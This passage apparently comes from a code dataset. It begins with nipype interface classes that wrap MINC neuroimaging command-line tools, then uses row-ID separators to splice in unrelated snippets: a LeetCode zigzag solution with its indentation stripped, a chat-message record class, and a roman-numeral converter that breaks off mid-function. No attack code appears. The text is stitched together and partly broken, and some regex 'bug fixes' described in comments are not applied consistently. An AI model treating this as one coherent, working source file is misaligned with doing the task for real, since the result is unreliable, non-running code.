        low=0.0,
        high=100.0,
        desc="Threshold percentage (0.1 == lower 10% of intensity range) [default: 0.1].",
        argstr="-threshold_perc %s",
    )
    threshold_bmt = traits.Bool(
        desc="Use the resulting image BiModalT as the threshold.",
        argstr="-threshold_bmt",
    )
    threshold_blur = traits.Float(
        desc="Blur FWHM for intensity edges then thresholding [default: 2].",
        argstr="-threshold_blur %s",
    )
class NormOutputSpec(TraitedSpec):
    """Output specification for :class:`Norm` (``mincnorm``)."""
    output_file = File(desc="output file", exists=True)
    output_threshold_mask = File(desc="threshold mask file")
class Norm(CommandLine):
    """Normalise a file between a maximum and a minimum, optionally
    derived from two histogram percentages.
    Examples
    --------
    >>> from nipype.interfaces.minc import Norm
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> n = Norm(input_file=minc2Dfile, output_file='/tmp/out.mnc') # Normalise the file.
    >>> n.run() # doctest: +SKIP
    """
    input_spec = NormInputSpec
    output_spec = NormOutputSpec
    _cmd = "mincnorm"
"""
| volcentre will centre a MINC image's sampling about a point (0,0,0 typically)
|
| NB: It will modify the file in-place unless an outfile is given
|
| Problems or comments should be sent to: a.janke@gmail.com
Summary of options:
-version print version and exit
-verbose be verbose
-noverbose opposite of -verbose [default]
-clobber clobber existing check files
-noclobber opposite of -clobber [default]
-fake do a dry run, (echo cmds only)
-nofake opposite of -fake [default]
-com Use the CoM of the volume for the new centre (via mincstats)
-nocom opposite of -com [default]
-centre <float> <float> <float>
Centre to use (x,y,z) [default: 0 0 0]
-zero_dircos Set the direction cosines to identity [default]
-nozero_dirco opposite of -zero_dircos
Usage: volcentre [options] <infile.mnc> [<outfile.mnc>]
volcentre -help to list options
"""
class VolcentreInputSpec(CommandLineInputSpec):
    """
    Input specification for :class:`Volcentre` (``volcentre``).
    Not implemented:
    -fake do a dry run, (echo cmds only)
    -nofake opposite of -fake [default]
    """
    input_file = File(
        desc="input file to centre",
        exists=True,
        mandatory=True,
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_volcentre.mnc",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    com = traits.Bool(
        desc="Use the CoM of the volume for the new centre (via mincstats). Default: False",
        argstr="-com",
    )
    centre = traits.Tuple(
        traits.Float,
        traits.Float,
        traits.Float,
        argstr="-centre %s %s %s",
        desc="Centre to use (x,y,z) [default: 0 0 0].",
    )
    zero_dircos = traits.Bool(
        desc="Set the direction cosines to identity [default].", argstr="-zero_dircos"
    )
class VolcentreOutputSpec(TraitedSpec):
    """Output specification for :class:`Volcentre` (``volcentre``)."""
    output_file = File(desc="output file", exists=True)
class Volcentre(CommandLine):
    """Centre a MINC image's sampling about a point, typically (0,0,0).
    Examples
    --------
    >>> from nipype.interfaces.minc import Volcentre
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> vc = Volcentre(input_file=minc2Dfile)
    >>> vc.run() # doctest: +SKIP
    """
    input_spec = VolcentreInputSpec
    output_spec = VolcentreOutputSpec
    _cmd = "volcentre"
class VolpadInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Volpad` (``volpad``).

    Not implemented:
    -fake do a dry run, (echo cmds only)
    -nofake opposite of -fake [default]
    | volpad pads a MINC volume
    |
    | Problems or comments should be sent to: a.janke@gmail.com
    Summary of options:
    -- General Options -------------------------------------------------------------
    -verbose          be verbose
    -noverbose        opposite of -verbose [default]
    -clobber          clobber existing files
    -noclobber        opposite of -clobber [default]
    -fake             do a dry run, (echo cmds only)
    -nofake           opposite of -fake [default]
    """
    input_file = File(
        # BUG FIX: desc said "input file to centre" (copy-paste from
        # Volcentre); volpad pads a volume.
        desc="input file to pad",
        exists=True,
        mandatory=True,
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_volpad.mnc",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    auto = traits.Bool(
        desc="Automatically determine padding distances (uses -distance as max). Default: False.",
        argstr="-auto",
    )
    auto_freq = traits.Float(
        desc="Frequency of voxels over bimodalt threshold to stop at [default: 500].",
        argstr="-auto_freq %s",
    )
    distance = traits.Int(
        desc="Padding distance (in voxels) [default: 4].", argstr="-distance %s"
    )
    smooth = traits.Bool(
        desc="Smooth (blur) edges before padding. Default: False.", argstr="-smooth"
    )
    smooth_distance = traits.Int(
        desc="Smoothing distance (in voxels) [default: 4].",
        argstr="-smooth_distance %s",
    )
class VolpadOutputSpec(TraitedSpec):
    """Output specification for :class:`Volpad` (``volpad``)."""
    output_file = File(desc="output file", exists=True)
class Volpad(CommandLine):
    """Pad a MINC volume, optionally smoothing (blurring) the edges first.

    (The previous docstring, "Centre a MINC image's sampling about a
    point", was copy-pasted from :class:`Volcentre`; ``volpad`` pads.)
    Examples
    --------
    >>> from nipype.interfaces.minc import Volpad
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> vp = Volpad(input_file=minc2Dfile, smooth=True, smooth_distance=4)
    >>> vp.run() # doctest: +SKIP
    """
    input_spec = VolpadInputSpec
    output_spec = VolpadOutputSpec
    _cmd = "volpad"
class VolisoInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Voliso` (``voliso``)."""
    input_file = File(
        desc="input file to convert to isotropic sampling",
        exists=True,
        mandatory=True,
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_voliso.mnc",
    )
    # NOTE: voliso takes GNU-style long options ("--verbose"), unlike the
    # single-dash options of the other MINC tools in this module.
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="--verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="--clobber",
        usedefault=True,
        default_value=True,
    )
    maxstep = traits.Float(
        desc="The target maximum step desired in the output volume.",
        argstr="--maxstep %s",
    )
    minstep = traits.Float(
        desc="The target minimum step desired in the output volume.",
        argstr="--minstep %s",
    )
    avgstep = traits.Bool(
        desc="Calculate the maximum step from the average steps of the input volume.",
        argstr="--avgstep",
    )
class VolisoOutputSpec(TraitedSpec):
    """Output specification for :class:`Voliso` (``voliso``)."""
    output_file = File(desc="output file", exists=True)
class Voliso(CommandLine):
    """Changes the steps and starts in order that the output volume
    has isotropic sampling.
    Examples
    --------
    >>> from nipype.interfaces.minc import Voliso
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> viso = Voliso(input_file=minc2Dfile, minstep=0.1, avgstep=True)
    >>> viso.run() # doctest: +SKIP
    """
    input_spec = VolisoInputSpec
    output_spec = VolisoOutputSpec
    _cmd = "voliso"
class GennlxfmInputSpec(CommandLineInputSpec):
    """Input specification for :class:`Gennlxfm` (``gennlxfm``)."""
    # The default output name is derived from the 'like' template file.
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["like"],
        hash_files=False,
        name_template="%s_gennlxfm.xfm",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    ident = traits.Bool(
        desc="Generate an identity xfm. Default: False.", argstr="-ident"
    )
    step = traits.Int(desc="Output ident xfm step [default: 1].", argstr="-step %s")
    like = File(desc="Generate a nlxfm like this file.", exists=True, argstr="-like %s")
class GennlxfmOutputSpec(TraitedSpec):
    """Output specification for :class:`Gennlxfm` (``gennlxfm``)."""
    output_file = File(desc="output file", exists=True)
    output_grid = File(desc="output grid", exists=True)
class Gennlxfm(CommandLine):
    """Generate nonlinear xfms. Currently only identity xfms
    are supported!
    This tool is part of minc-widgets:
    https://github.com/BIC-MNI/minc-widgets/blob/master/gennlxfm/gennlxfm
    Examples
    --------
    >>> from nipype.interfaces.minc import Gennlxfm
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> gennlxfm = Gennlxfm(step=1, like=minc2Dfile)
    >>> gennlxfm.run() # doctest: +SKIP
    """
    input_spec = GennlxfmInputSpec
    output_spec = GennlxfmOutputSpec
    _cmd = "gennlxfm"

    def _list_outputs(self):
        """Also report the grid file written alongside the output xfm."""
        outputs = super()._list_outputs()
        # BUG FIX: escape the dot -- the previous pattern ".(nlxfm|xfm)$" let
        # "." match any character, so names like "foo_nlxfm" were rewritten.
        outputs["output_grid"] = re.sub(
            r"\.(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
        )
        return outputs
class XfmConcatInputSpec(CommandLineInputSpec):
    """Input specification for :class:`XfmConcat` (``xfmconcat``)."""
    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s)",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
    )
    # This is a dummy input.
    input_grid_files = InputMultiPath(File, desc="input grid file(s)")
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_xfmconcat.xfm",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
class XfmConcatOutputSpec(TraitedSpec):
    """Output specification for :class:`XfmConcat` (``xfmconcat``)."""
    output_file = File(desc="output file", exists=True)
    output_grids = OutputMultiPath(File(exists=True), desc="output grids")
class XfmConcat(CommandLine):
    """Concatenate transforms together. The output transformation
    is equivalent to applying input1.xfm, then input2.xfm, ..., in
    that order.
    Examples
    --------
    >>> from nipype.interfaces.minc import XfmConcat
    >>> from nipype.interfaces.minc.testdata import minc2Dfile
    >>> conc = XfmConcat(input_files=['input1.xfm', 'input1.xfm'])
    >>> conc.run() # doctest: +SKIP
    """
    input_spec = XfmConcatInputSpec
    output_spec = XfmConcatOutputSpec
    _cmd = "xfmconcat"

    def _list_outputs(self):
        """Report output grid files (written for nonlinear transforms)."""
        outputs = super()._list_outputs()
        if os.path.exists(outputs["output_file"]):
            # BUG FIX: close the file handle (was a bare open().read()).
            with open(outputs["output_file"]) as xfm_file:
                has_grid = "grid" in xfm_file.read()
            if has_grid:
                # BUG FIX: escape the dot in the extension regex.
                outputs["output_grids"] = glob.glob(
                    re.sub(r"\.(nlxfm|xfm)$", "_grid_*.mnc", outputs["output_file"])
                )
        return outputs
class BestLinRegInputSpec(CommandLineInputSpec):
    """Inputs for the ``bestlinreg`` hierarchical linear registration script."""

    source = File(
        desc="source Minc file", exists=True, mandatory=True, argstr="%s", position=-4
    )
    target = File(
        desc="target Minc file", exists=True, mandatory=True, argstr="%s", position=-3
    )
    # Both outputs are auto-named from the source file when not supplied.
    output_xfm = File(
        desc="output xfm file",
        genfile=True,
        argstr="%s",
        position=-2,
        name_source=["source"],
        hash_files=False,
        name_template="%s_bestlinreg.xfm",
        keep_extension=False,
    )
    output_mnc = File(
        desc="output mnc file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["source"],
        hash_files=False,
        name_template="%s_bestlinreg.mnc",
        keep_extension=False,
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME Very bare implementation, none of these are done yet:
    """
    -init_xfm initial transformation (default identity)
    -source_mask source mask to use during fitting
    -target_mask target mask to use during fitting
    -lsq9 use 9-parameter transformation (default)
    -lsq12 use 12-parameter transformation (default -lsq9)
    -lsq6 use 6-parameter transformation
    """
class BestLinRegOutputSpec(TraitedSpec):
    """Outputs for ``bestlinreg``."""

    output_xfm = File(desc="output xfm file", exists=True)
    output_mnc = File(desc="output mnc file", exists=True)
class BestLinReg(CommandLine):
    """Hierachial linear fitting between two files.

    The bestlinreg script is part of the EZminc package:
    https://github.com/BIC-MNI/EZminc/blob/master/scripts/bestlinreg.pl

    Examples
    --------
    >>> from nipype.interfaces.minc import BestLinReg
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> input_file = nonempty_minc_data(0)
    >>> target_file = nonempty_minc_data(1)
    >>> linreg = BestLinReg(source=input_file, target=target_file)
    >>> linreg.run() # doctest: +SKIP
    """

    input_spec = BestLinRegInputSpec
    output_spec = BestLinRegOutputSpec
    _cmd = "bestlinreg"
class NlpFitInputSpec(CommandLineInputSpec):
    """Inputs for the ``nlpfit`` hierarchical non-linear fitting tool."""

    source = File(
        desc="source Minc file", exists=True, mandatory=True, argstr="%s", position=-3
    )
    target = File(
        desc="target Minc file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    # Generated by NlpFit._gen_filename when not supplied.
    output_xfm = File(desc="output xfm file", genfile=True, argstr="%s", position=-1)
    # This is a dummy input.  (No argstr: it only lets upstream nodes hand
    # over grid volumes that accompany non-linear transforms.)
    input_grid_files = InputMultiPath(File, desc="input grid file(s)")
    config_file = File(
        desc="File containing the fitting configuration use.",
        argstr="-config_file %s",
        mandatory=True,
        exists=True,
    )
    init_xfm = File(
        desc="Initial transformation (default identity).",
        argstr="-init_xfm %s",
        mandatory=True,
        exists=True,
    )
    source_mask = File(
        desc="Source mask to use during fitting.",
        argstr="-source_mask %s",
        mandatory=True,
        exists=True,
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
class NlpFitOutputSpec(TraitedSpec):
    """Outputs for ``nlpfit``."""

    output_xfm = File(desc="output xfm file", exists=True)
    # Displacement grid written next to the xfm for non-linear fits
    # (populated by NlpFit._list_outputs).
    output_grid = File(desc="output grid file", exists=True)
class NlpFit(CommandLine):
    """Hierarchial non-linear fitting with bluring.

    This tool is part of the minc-widgets package:
    https://github.com/BIC-MNI/minc-widgets/blob/master/nlpfit/nlpfit

    Examples
    --------
    >>> from nipype.interfaces.minc import NlpFit
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data, nlp_config
    >>> from nipype.testing import example_data
    >>> source = nonempty_minc_data(0)
    >>> target = nonempty_minc_data(1)
    >>> source_mask = nonempty_minc_data(2)
    >>> config = nlp_config
    >>> initial = example_data('minc_initial.xfm')
    >>> nlpfit = NlpFit(config_file=config, init_xfm=initial, source_mask=source_mask, source=source, target=target)
    >>> nlpfit.run() # doctest: +SKIP
    """

    input_spec = NlpFitInputSpec
    output_spec = NlpFitOutputSpec
    _cmd = "nlpfit"

    def _gen_filename(self, name):
        """Return a default path for ``output_xfm`` when the user gave none."""
        if name == "output_xfm":
            output_xfm = self.inputs.output_xfm
            if isdefined(output_xfm):
                return os.path.abspath(output_xfm)
            return (
                aggregate_filename(
                    [self.inputs.source, self.inputs.target], "nlpfit_xfm_output"
                )
                + ".xfm"
            )
        # BUG FIX: was ``raise NotImplemented`` -- NotImplemented is a sentinel
        # value, not an exception class, so raising it produced a TypeError.
        raise NotImplementedError(name)

    def _list_outputs(self):
        """Report the xfm and, for non-linear fits, its displacement grid."""
        outputs = self.output_spec().get()
        outputs["output_xfm"] = os.path.abspath(self._gen_filename("output_xfm"))
        assert os.path.exists(outputs["output_xfm"])
        # The xfm file is textual; a "grid" reference means nlpfit also wrote
        # a grid volume next to it.  ``with`` closes the handle instead of
        # leaking it as the original ``open(...).read()`` did.
        with open(outputs["output_xfm"]) as xfm:
            has_grid = "grid" in xfm.read()
        if has_grid:
            outputs["output_grid"] = re.sub(
                ".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_xfm"]
            )
        return outputs
class XfmAvgInputSpec(CommandLineInputSpec):
    """Inputs for ``xfmavg``."""

    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s)",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
    )
    # This is a dummy input.  (No argstr: it only lets upstream nodes hand
    # over grid volumes that accompany non-linear transforms.)
    input_grid_files = InputMultiPath(File, desc="input grid file(s)")
    output_file = File(desc="output file", genfile=True, argstr="%s", position=-1)
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME xor these:
    avg_linear = traits.Bool(
        desc="average the linear part [default].", argstr="-avg_linear"
    )
    avg_nonlinear = traits.Bool(
        desc="average the non-linear part [default].", argstr="-avg_nonlinear"
    )
    ignore_linear = traits.Bool(
        desc="opposite of -avg_linear.", argstr="-ignore_linear"
    )
    # NOTE(review): argstr looks truncated ("-ignore_nonline" vs
    # "-ignore_nonlinear").  xfmavg's option parser may accept unambiguous
    # prefixes, so this could still work -- confirm against the tool before
    # changing the flag.
    ignore_nonlinear = traits.Bool(
        desc="opposite of -avg_nonlinear.", argstr="-ignore_nonline"
    )
class XfmAvgOutputSpec(TraitedSpec):
    """Outputs for ``xfmavg``."""

    output_file = File(desc="output file", exists=True)
    # Grid volume for non-linear averages (populated by XfmAvg._list_outputs).
    output_grid = File(desc="output grid file", exists=True)
class XfmAvg(CommandLine):
    """Average a number of xfm transforms using matrix logs and exponents.
    The program xfmavg calls Octave for numerical work.

    This tool is part of the minc-widgets package:
    https://github.com/BIC-MNI/minc-widgets/tree/master/xfmavg

    Examples
    --------
    >>> from nipype.interfaces.minc import XfmAvg
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data, nlp_config
    >>> from nipype.testing import example_data
    >>> xfm1 = example_data('minc_initial.xfm')
    >>> xfm2 = example_data('minc_initial.xfm')  # cheating for doctest
    >>> xfmavg = XfmAvg(input_files=[xfm1, xfm2])
    >>> xfmavg.run() # doctest: +SKIP
    """

    input_spec = XfmAvgInputSpec
    output_spec = XfmAvgOutputSpec
    _cmd = "xfmavg"

    def _gen_filename(self, name):
        """Return a default path for ``output_file`` when the user gave none."""
        if name == "output_file":
            output_file = self.inputs.output_file
            if isdefined(output_file):
                return os.path.abspath(output_file)
            return (
                aggregate_filename(self.inputs.input_files, "xfmavg_output")
                + ".xfm"
            )
        # BUG FIX: was ``raise NotImplemented`` -- NotImplemented is a sentinel
        # value, not an exception class, so raising it produced a TypeError.
        raise NotImplementedError(name)

    def _gen_outfilename(self):
        return self._gen_filename("output_file")

    def _list_outputs(self):
        """Report the averaged xfm and, for non-linear averages, its grid."""
        outputs = self.output_spec().get()
        outputs["output_file"] = os.path.abspath(self._gen_outfilename())
        assert os.path.exists(outputs["output_file"])
        # ``with`` closes the handle instead of leaking it as the original
        # bare ``open(...).read()`` did.
        with open(outputs["output_file"]) as xfm:
            has_grid = "grid" in xfm.read()
        if has_grid:
            outputs["output_grid"] = re.sub(
                ".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
            )
        return outputs
class XfmInvertInputSpec(CommandLineInputSpec):
    """Inputs for ``xfminvert``."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    # Generated by XfmInvert._gen_filename when not supplied.
    output_file = File(desc="output file", genfile=True, argstr="%s", position=-1)
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
class XfmInvertOutputSpec(TraitedSpec):
    """Outputs for ``xfminvert``."""

    output_file = File(desc="output file", exists=True)
    # Grid volume for inverted non-linear transforms
    # (populated by XfmInvert._list_outputs).
    output_grid = File(desc="output grid file", exists=True)
class XfmInvert(CommandLine):
    """Invert an xfm transform file.

    Examples
    --------
    >>> from nipype.interfaces.minc import XfmInvert
    >>> from nipype.testing import example_data
    >>> xfm = example_data('minc_initial.xfm')
    >>> invert = XfmInvert(input_file=xfm)
    >>> invert.run() # doctest: +SKIP
    """
    # (Doc fix: the example previously imported XfmAvg instead of XfmInvert.)

    input_spec = XfmInvertInputSpec
    output_spec = XfmInvertOutputSpec
    _cmd = "xfminvert"

    def _gen_filename(self, name):
        """Return a default path for ``output_file`` when the user gave none."""
        if name == "output_file":
            output_file = self.inputs.output_file
            if isdefined(output_file):
                return os.path.abspath(output_file)
            return (
                aggregate_filename([self.inputs.input_file], "xfminvert_output")
                + ".xfm"
            )
        # BUG FIX: was ``raise NotImplemented`` -- NotImplemented is a sentinel
        # value, not an exception class, so raising it produced a TypeError.
        raise NotImplementedError(name)

    def _gen_outfilename(self):
        return self._gen_filename("output_file")

    def _list_outputs(self):
        """Report the inverted xfm and, for non-linear transforms, its grid."""
        outputs = self.output_spec().get()
        outputs["output_file"] = os.path.abspath(self._gen_outfilename())
        assert os.path.exists(outputs["output_file"])
        # ``with`` closes the handle instead of leaking it as the original
        # bare ``open(...).read()`` did.
        with open(outputs["output_file"]) as xfm:
            has_grid = "grid" in xfm.read()
        if has_grid:
            outputs["output_grid"] = re.sub(
                ".(nlxfm|xfm)$", "_grid_0.mnc", outputs["output_file"]
            )
        return outputs
class BigAverageInputSpec(CommandLineInputSpec):
    """Inputs for ``mincbigaverage``."""

    input_files = InputMultiPath(
        File(exists=True),
        desc="input file(s)",
        mandatory=True,
        sep=" ",
        argstr="%s",
        position=-2,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_bigaverage.mnc",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="--verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="--clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME Redumentary implementation, various parameters not implemented.
    # TODO!
    output_float = traits.Bool(
        desc="Output files with float precision.", argstr="--float"
    )
    # BUG FIX: the adjacent string literals below previously concatenated
    # without separating spaces, rendering the help text as
    # "standarddeviation", "noisydata" and "alarge".
    robust = traits.Bool(
        desc=(
            "Perform robust averaging, features that are outside 1 standard "
            "deviation from the mean are downweighted. Works well for noisy "
            "data with artifacts. see the --tmpdir option if you have a "
            "large number of input files."
        ),
        argstr="-robust",
    )
    # Should Nipype deal with where the temp directory is?
    tmpdir = Directory(desc="temporary files directory", argstr="-tmpdir %s")
    sd_file = File(
        desc="Place standard deviation image in specified file.",
        argstr="--sdfile %s",
        name_source=["input_files"],
        hash_files=False,
        name_template="%s_bigaverage_stdev.mnc",
    )
class BigAverageOutputSpec(TraitedSpec):
    """Outputs for ``mincbigaverage``."""

    output_file = File(desc="output file", exists=True)
    sd_file = File(desc="standard deviation image", exists=True)
class BigAverage(CommandLine):
    """Average 1000's of MINC files in linear time.

    mincbigaverage is designed to discretise the problem of averaging either
    a large number of input files or averaging a smaller number of large
    files. (>1GB each). There is also some code included to perform "robust"
    averaging in which only the most common features are kept via down-weighting
    outliers beyond a standard deviation.

    One advantage of mincbigaverage is that it avoids issues around the number
    of possible open files in HDF/netCDF. In short if you have more than 100
    files open at once while averaging things will slow down significantly.

    mincbigaverage does this via a iterative approach to averaging files and
    is a direct drop in replacement for mincaverage. That said not all the
    arguments of mincaverage are supported in mincbigaverage but they should
    be.

    This tool is part of the minc-widgets package:
    https://github.com/BIC-MNI/minc-widgets/blob/master/mincbigaverage/mincbigaverage

    Examples
    --------
    >>> from nipype.interfaces.minc import BigAverage
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> files = [nonempty_minc_data(i) for i in range(3)]
    >>> average = BigAverage(input_files=files, output_float=True, robust=True)
    >>> average.run() # doctest: +SKIP
    """

    input_spec = BigAverageInputSpec
    output_spec = BigAverageOutputSpec
    _cmd = "mincbigaverage"
class ReshapeInputSpec(CommandLineInputSpec):
    """Inputs for ``mincreshape``."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_reshape.mnc",
    )
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME MANY options not implemented!
    write_short = traits.Bool(desc="Convert to short integer data.", argstr="-short")
class ReshapeOutputSpec(TraitedSpec):
    """Outputs for ``mincreshape``."""

    output_file = File(desc="output file", exists=True)
class Reshape(CommandLine):
    """Cut a hyperslab out of a minc file, with dimension reordering.

    This is also useful for rewriting with a different format, for
    example converting to short (see example below).

    Examples
    --------
    >>> from nipype.interfaces.minc import Reshape
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> input_file = nonempty_minc_data(0)
    >>> reshape_to_short = Reshape(input_file=input_file, write_short=True)
    >>> reshape_to_short.run() # doctest: +SKIP
    """

    input_spec = ReshapeInputSpec
    output_spec = ReshapeOutputSpec
    _cmd = "mincreshape"
class VolSymmInputSpec(CommandLineInputSpec):
    """Inputs for ``volsymm``."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-3
    )
    trans_file = File(
        desc="output xfm trans file",
        genfile=True,
        argstr="%s",
        position=-2,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_vol_symm.xfm",
        keep_extension=False,
    )
    output_file = File(
        desc="output file",
        genfile=True,
        argstr="%s",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s_vol_symm.mnc",
    )
    # This is a dummy input.  (No argstr: it only lets upstream nodes hand
    # over grid volumes that accompany non-linear transforms.)
    input_grid_files = InputMultiPath(File, desc="input grid file(s)")
    verbose = traits.Bool(
        desc="Print out log messages. Default: False.", argstr="-verbose"
    )
    clobber = traits.Bool(
        desc="Overwrite existing file.",
        argstr="-clobber",
        usedefault=True,
        default_value=True,
    )
    # FIXME MANY options not implemented!
    fit_linear = traits.Bool(desc="Fit using a linear xfm.", argstr="-linear")
    fit_nonlinear = traits.Bool(desc="Fit using a non-linear xfm.", argstr="-nonlinear")
    # FIXME This changes the input/output behaviour of trans_file! Split into
    # two separate interfaces?
    nofit = traits.Bool(
        desc="Use the input transformation instead of generating one.", argstr="-nofit"
    )
    config_file = File(
        desc="File containing the fitting configuration (nlpfit -help for info).",
        argstr="-config_file %s",
        exists=True,
    )
    x = traits.Bool(desc="Flip volume in x-plane (default).", argstr="-x")
    y = traits.Bool(desc="Flip volume in y-plane.", argstr="-y")
    z = traits.Bool(desc="Flip volume in z-plane.", argstr="-z")
class VolSymmOutputSpec(TraitedSpec):
    """Outputs for ``volsymm``."""

    output_file = File(desc="output file", exists=True)
    trans_file = File(desc="xfm trans file", exists=True)
    output_grid = File(
        desc="output grid file", exists=True
    )  # FIXME Is exists=True correct?
class VolSymm(CommandLine):
    """Make a volume symmetric about an axis either linearly
    and/or nonlinearly. This is done by registering a volume
    to a flipped image of itself.

    This tool is part of the minc-widgets package:
    https://github.com/BIC-MNI/minc-widgets/blob/master/volsymm/volsymm

    Examples
    --------
    >>> from nipype.interfaces.minc import VolSymm
    >>> from nipype.interfaces.minc.testdata import nonempty_minc_data
    >>> input_file = nonempty_minc_data(0)
    >>> volsymm = VolSymm(input_file=input_file)
    >>> volsymm.run() # doctest: +SKIP
    """

    input_spec = VolSymmInputSpec
    output_spec = VolSymmOutputSpec
    _cmd = "volsymm"

    def _list_outputs(self):
        """Add the grid volume when the fitted transform is non-linear."""
        outputs = super()._list_outputs()
        # Have to manually check for the grid files.  ``with`` closes the
        # handle instead of leaking it as the original ``open(...).read()`` did.
        if os.path.exists(outputs["trans_file"]):
            with open(outputs["trans_file"]) as xfm:
                has_grid = "grid" in xfm.read()
            if has_grid:
                outputs["output_grid"] = re.sub(
                    ".(nlxfm|xfm)$", "_grid_0.mnc", outputs["trans_file"]
                )
        return outputs
|
23,430 | f54bac4532178113172708ce433ddcb373128a81 | class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or numRows > len(s):
return s
rows = ["" for _ in range(numRows)]
cur, step = 0, 1
for c in s:
rows[cur] += c
cur += step
if cur == 0 or cur == numRows - 1:
step = step * -1
return "".join(rows)
|
23,431 | a77074ceb9cf6719f34536aaf624de25c4616177 | import datetime
import json
class EDiscussion:
    """Flat record of a chat discussion message: channel, text, user, date."""

    def create_from_discussion(self, discussion):
        """Populate fields from a message object (Telegram-style attributes);
        returns self so calls can be chained."""
        self.channel = discussion.chat.title
        self.text = discussion.text
        self.user = discussion.from_user.first_name
        # Unix timestamp -> local-time 'YYYY-MM-DD' string.
        self.date = datetime.datetime.fromtimestamp(discussion.date).strftime('%Y-%m-%d')
        return self

    def create_from_attributes(self, attrs):
        """Populate fields from a [channel, text, user, date] sequence;
        returns self so calls can be chained."""
        self.channel = attrs[0]
        self.text = attrs[1]
        self.user = attrs[2]
        self.date = attrs[3]
        return self
# Value of each single roman numeral character.
to_int = {
    'I': 1,
    'V': 5,
    'X': 10,
    'L': 50,
    'C': 100,
    'D': 500,
    'M': 1000,
}

# IV -> smaller before larger  -> contributes larger - smaller
# XI -> larger before smaller  -> contributes larger + smaller


def roman_to_int(roman):
    """Convert a roman numeral string to an integer.

    Mirrors the original contract: a single character returns its value
    and an empty string returns -1.
    """
    if len(roman) == 1:
        return to_int[roman]
    if len(roman) < 1:
        return -1
    total = 0
    i = 0
    while i < len(roman):
        # A smaller value directly before a larger one forms a subtractive
